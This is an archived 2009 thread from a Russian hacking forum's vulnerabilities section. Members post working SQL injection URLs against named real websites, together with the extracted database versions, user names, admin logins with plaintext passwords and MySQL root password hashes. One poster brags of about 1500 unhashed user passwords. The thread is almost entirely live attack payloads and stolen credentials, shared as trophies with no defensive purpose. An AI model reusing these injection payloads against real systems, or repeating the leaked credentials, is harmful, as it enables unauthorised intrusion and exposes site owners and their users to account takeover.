HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.02.2009, 20:30
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.aktas.lt/news/news_open.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(), user(),database()),5,6--
Database Version : 4.0.27-standard
Database name : aktas_duombaze
User name : aktas@localhost
 
Ответить с цитированием

  #2  
Старый 11.02.2009, 22:42
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.angelhitomi.com/bbs/mex.php?id=-48+union+select+1,2,version(),4,5,6,7,8,9,10/*
4.1.22-standard-log

PR: 4
 
Ответить с цитированием

  #3  
Старый 11.02.2009, 23:01
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.incubator.tsu.ru PageRank: 3 тИЦ: 4700
Код HTML:
http://www.incubator.tsu.ru/contest/?org=3+union+select+1,2,3,4,5,6,7,8,9,group_concat(concat_ws(0x3A,username,user_password)+SEPARATOR+0x3c62723e),11+from+incubator_tsu_ru.phpbb_users+where+user_level=1--
админка форума:
http://www.incubator.tsu.ru/forum/admin/index.php
-------------------------------------------------------------------------
gwru.ru PageRank: 5 тИЦ: 500

Код HTML:
http://gwru.ru/world/base?id=-2378+union+select+1,concat_ws(0x3A,user(),@@version,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Последний раз редактировалось AkyHa_MaTaTa; 11.02.2009 в 23:41..
 
Ответить с цитированием

  #4  
Старый 11.02.2009, 23:18
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

www.rmz-kazan.ru

Цитата:
третья версия MySQL
http://www.rmz-kazan.ru/?page=5'+and+substring(version(),1,1)='3
юзер:
Цитата:
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),1,1))='114 r
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),2,1))='109 m
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),3,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),4,1))='95 _
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),5,1))='107 k
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),6,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),7,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),8,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),9,1))='110 n
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),10,1))='64 @
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),11,1))='108 l
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),12,1))='111 o
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),13,1))='99 c
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),14,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),15,1))='108 l
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),16,1))='104 h
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),17,1))='111 o
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),18,1))='115 s
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(user(),19,1))='116 t
БД:
Цитата:
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),1,1))='114 r
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),2,1))='109 m
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),3,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),4,1))='95 _
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),5,1))='107 k
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),6,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),7,1))='122 z
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),8,1))='97 a
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),9,1))='110 n
http://www.rmz-kazan.ru/?page=5'+and+ascii(substring(database(),10,1))='0
 
Ответить с цитированием

  #5  
Старый 11.02.2009, 22:49
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://produsesiservicii.profitromania.ro/modul/?id_compan=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7/*


Version : 5.0.32-DEBIAN_7ETCH8-LOG
Database : PROFIT
User : PROFIT@LOCALHOST
 
Ответить с цитированием

  #6  
Старый 12.02.2009, 02:42
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Мобильный портал, а также магазин сотовых телефонов. PR - 4

Код:
http://www.o-connect.com/index.php?type=news&id=-1+union+select+concat_ ws(0x3a,version (),user(),database())--
Database Version : 5.0.45
Database name : oconn_oconnectdb
User name : oconn_oconect@localhost


хватаем узеров :
Код:
 http://www.o-connect.com/index.php?type=news&id=-1+union+select+ concat_ws(0x3a,Username,Password)+from +tblendusers+limit+0,1--
их около 1500 тысячи, пассы не захешированы ))

Последний раз редактировалось f1ng3r; 12.02.2009 в 02:49..
 
Ответить с цитированием

  #7  
Старый 12.02.2009, 03:59
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.hackleyhme.com/health.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password),4+from+Admin--
логин/пасс:
Код:
hme2003:w1nt3r
 
Ответить с цитированием

  #8  
Старый 12.02.2009, 05:26
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Даешь аниме нахаляву
Код HTML:
http://animefilm.biz/lib_object_view.php?o=-150'+union+select+concat_ws(0x3A,user(),version(),database()),2,3,4,5,6,7,8,9,10/*

Последний раз редактировалось AkyHa_MaTaTa; 12.02.2009 в 08:17..
 
Ответить с цитированием

  #9  
Старый 12.02.2009, 06:47
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.pocketmac.com/product.php?id=309809777809+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30--
Database Version: 5.0.54-log
Database name: pocketmacsite
User name: websitead@67.199.10.22


Админы


Цитата:
http://www.pocketmac.com/product.php?id=309809777809+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(userid ,0x3a,password)+FROM+pocketmacsite.admin+LIMIT+0,1 ),0x3a),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
useridassword

: admin : billy34b
: shekhar : newdelhi
: anne : paloma20




Цитата:
http://www.fazed.org/video/view/?id=380998767+union+select+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6,7,8,9,10,11,12--
Database Version: 5.0.67-community-log
Database name: fazed
User name: root@localhost


Цитата:
http://www.fazed.org/video/view/?id=380998767+union+select+1,2,3,concat_ws(0x3a,us er,password),5,6,7,8,9,10,11,12+from+mysql.user+li mit+0,1--
root : *49D31C9CB8CACAC3832DCA30E2A09DD4F0A7E236



Цитата:
http://www.teses.eu/?id=38098770976+union+select+1,concat_ws(0x3a,vers ion(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17--
Version:4.1.10-standard-log
User:gazela_teses@localhost
Database:gazela_teses


Цитата:
http://www.ufcw1776.org/page.php?id=3890809877908+union+select+concat_ws(0 x3a,version(),user(),database()),2,3,4--
Database Version: 5.0.26-standard-log
Database name: ufcw1776_org
User name: ufcw2@localhost


Цитата:
http://www.musgrave.ie/aboutusa.php?id=37%20or%201=@@version--
Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86) Apr 14 2006 01:12:25 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1


Цитата:
http://www.musgrave.ie/aboutusa.php?id=37%20or%201=(select%20system_user)--
musgravew3


Цитата:
http://www.musgrave.ie/aboutusa.php?id=37%20or%201=(select%20db_name())--
musgrave.ie




Цитата:
http://en.pasen.it/product_detail.php?id=637987987698+union+select+1, concat_ws(0x3a,version(),user(),database()),3,4,5, 6,7,8,9--
Version:5.0.32-Debian_7etch8-log
User:cutefact_admin@localhost
Databaseasen


Цитата:
http://en.pasen.it/product_detail.php?id=637987987698+union+select+1, concat_ws(0x3a,user,password),3,4,5,6,7,8,9+from+m ysql.user+limit+0,1--
root: *3E3ACE7EDB1397754856E421374855C2B32DAA7C
vftp: *8DC54F2E15823C98AEA063E339A5D4C53D1A471A
debian-sys-maint: *BA2FFA1BFAD117D74877D6C5F238406F678F87E8
cutefact_admin: *DEDA5FF13D1EAC8D04D2F5473D2FC9B26853A8B1
syscp: *DEDA5FF13D1EAC8D04D2F5473D2FC9B26853A8B1


Цитата:
http://www.freevstfx.com/free_vst_fx.php?id=79887379876+union+select+1,2,3, concat_ws(0x3a,version(),user(),database()),5,6,7, 8,9,10--

Version:5.0.44-log
User:freevstf@localhost
Database:freevstf


Боенги Боенги Боенги -)



Цитата:
http://www.747sp.com/newsdetail.asp?id=3798798698567+union+select+1,con cat_ws(0x3a,version(),user(),database()),3,4,5,6,7 ,8,9--
Version:4.0.27-max-log
User:Crew747sp@64.202.163.35
Database:Crew747sp

Последний раз редактировалось spherics; 12.02.2009 в 08:38..
 
Ответить с цитированием

  #10  
Старый 12.02.2009, 15:37
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

images.ourontario.ca - PR4

Код:
http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2
Код:
http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=(SELECT+system_user)--
User: OntarioImagesRead
Код:
http://images.ourontario.ca/oshawa/details.asp?ID=42587+or+42587=(SELECT+db_name())--
CurrentDB: OntarioImages
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ